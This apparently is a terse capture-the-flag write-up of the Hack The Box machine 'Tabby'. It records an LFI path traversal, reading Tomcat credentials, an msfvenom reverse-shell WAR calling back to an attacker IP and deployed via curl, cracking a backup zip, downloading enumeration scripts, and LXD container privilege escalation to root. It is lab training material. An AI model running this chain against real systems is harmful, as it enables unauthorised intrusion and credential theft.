nmap -sC -sV -oN nmap 10.10.10.194 -v -A

80, 22 and 8080

apache version = 9.0.31

in http://10.10.10.194/files/statement
```
We apologise to all our customers for the previous data breach.
We have changed the site to remove this tool, and have invested heavily in more secure servers
```

http://megahosting.htb/news.php?file=statement -> does not work
http://10.10.10.194/news.php?file=statement -> does work
-> is it the removed tool? lfi?

tried dirb, wfuzz, php filters... (on archive/ too)

http://10.10.10.194/news.php?file=../../../../etc/passwd
-> works!

in 8080 ->
```
NOTE: For security reasons, using the manager webapp is restricted to users
with role "manager-gui". The host-manager webapp is restricted to users with
role "admin-gui". Users are defined in /etc/tomcat9/tomcat-users.xml.
```

but nothing in ../../../../etc/tomcat9/tomcat-users.xml
after some tests with tomcat
-> ../../../../usr/share/tomcat9/etc/tomcat-users.xml

creds = tomcat:$3cureP4s5w0rd123!

lets create war revshell with msfvenom
msfvenom -p java/shell_reverse_tcp lhost=10.10.14.27 lport=4444 -f war -o shell.war

cant access /manager via browser, lets try with curl directly
now upload revshell with curl:
curl --upload-file shell.war "http://10.10.10.194:8080/manager/text/deploy?path=/shell.war" --user 'tomcat:$3cureP4s5w0rd123!'

now lets visit http://10.10.10.194:8080/shell.war

shell as `tomcat`
python3 -c 'import pty; pty.spawn("/bin/bash")'

in /var/backups -> .gz files, lets dl them on host with nc

```
tomcat@tabby:/var/backups$ ls -all
-rw-r--r--  1 root root 41559 Jun 17 16:22 apt.extended_states.0
-rw-r--r--  1 root root  4561 May 21 13:16 apt.extended_states.1.gz
-rw-r--r--  1 root root  4400 May 21 10:31 apt.extended_states.2.gz
-rw-r--r--  1 root root  3683 May 19 11:54 apt.extended_states.3.gz
```

decompress everything but nothing
-> /var/www/html/files belongs to `ash`
-rw-r--r-- 1 ash  ash  8716 Jun 16 13:42 16162020_backup.zip
-> lets dl it

password protected -> fcrackzip -D -p /usr/share/wordlists/rockyou.txt -v 16162020_backup.zip
-> admin@it

su ash with the password -> get user flag
e7b9fbf22b9fabc4b70156152f3117d3

id -> `uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)`

find / -group adm 2>/dev/null
-> only one interesting but i dont find anything, too much files

curl http://10.10.14.27:8000/LinEnum.sh -o LinEnum.sh
curl http://10.10.14.27:8000/linpeas.sh -o linpeas.sh

```
...
[+] Unexpected folders in root
/cdrom

...
[+] Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root adm 10769 Jun 17 16:03 /var/log/apache2/access.log.1
-rw-r----- 1 root adm 869 Jul  2 19:02 /var/log/apache2/error.log.1
-rw-r----- 1 root adm 15061540 Jul  2 22:10 /var/log/apache2/access.log
-rw-r----- 1 root adm 0 May 21 10:31 /var/log/apache2/other_vhosts_access.log
-rw-r----- 1 root adm 937 Jun 20 20:58 /var/log/apache2/error.log.2.gz
-rw-r----- 1 root adm 2733131 Jul  2 21:49 /var/log/apache2/error.log
-rw-r----- 1 root adm 2423 Jun 16 16:42 /var/log/apache2/access.log.2.gz
-rw-r----- 1 root adm 1521 Jun 16 21:26 /var/log/apache2/error.log.3.gz
-rw-r----- 1 root adm 581 Jun 17 16:22 /var/log/apt/term.log.1.gz
-rw-r----- 1 root adm 0 Jul  2 19:02 /var/log/apt/term.log
-rw-r----- 1 root adm 10619 May 21 13:16 /var/log/apt/term.log.2.gz

...
[+] Finding passwords inside logs (limit 70)
...
/var/log/auth.log.1:Jun 16 17:54:15 ghost passwd[1307]: pam_unix(passwd:chauthtok): password changed for ash
```

-> still nothing... lets dig priv escalation with those weird groups
https://www.hackingarticles.in/lxd-privilege-escalation/
-> use lxd-alpine-builder

python -m SimpleHTTPServer
curl http:/10.10.14.27/alpine-v3.12-x86_64-20200702_1826.tar.gz -o alpine-v3.12-x86_64-20200702_1826.tar.gz

lxc image import ./alpine-v3.12-x86_64-20200702_1826.tar.gz --alias myimg
lxd init
lxc init myimg ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

-> root flag in /mnt/root/root
66f92a3581eef5b294ceb0826f4b7563
